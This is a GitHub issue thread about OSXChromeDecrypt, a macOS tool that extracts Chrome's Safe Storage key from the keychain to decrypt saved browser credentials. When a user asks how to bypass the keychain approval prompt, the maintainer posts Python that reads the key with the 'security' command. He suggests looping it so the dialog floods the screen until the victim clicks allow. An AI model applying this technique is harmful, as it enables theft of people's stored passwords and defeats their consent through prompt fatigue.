### ISSUE TITLE
Automate popup dialog submission

### ISSUE THREAD

**Issue by kokozaurz** [manwhoami/OSXChromeDecrypt#2]
Hey,

Great tool. Wondering - have you found a way to automatically submit the 'allow' on the security dialog that pops up when we are attempting to extract the key from keychain?

**Comment by manwhoami** [comment]
Hey @kokozaurz,

Thank you. Since Yosemite, apple has made this incredibly difficult / impossible to do without being having root permissions. 

If you wrap the 
```
safe_storage_key = subprocess.Popen("security find-generic-password -wa 'Chrome'", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
if safe_storage_key.wait() != 0:
    print '%sERROR getting Chrome Safe Storage Key%s' % ('\033[91m', '\033[0m')
    if safe_storage_key.wait() == 51:
        print 'User clicked deny'
    elif safe_storage_key.wait() == 44:
        print 'Chrome entry not found in user keychain'
    else:
        print safe_storage_key.stderr.read()
    exit()
```

in a while loop, and add a break after `print safe_storage_key.stderr.read()`, then you can essentially blast then screen with the dialog until accept it hit.
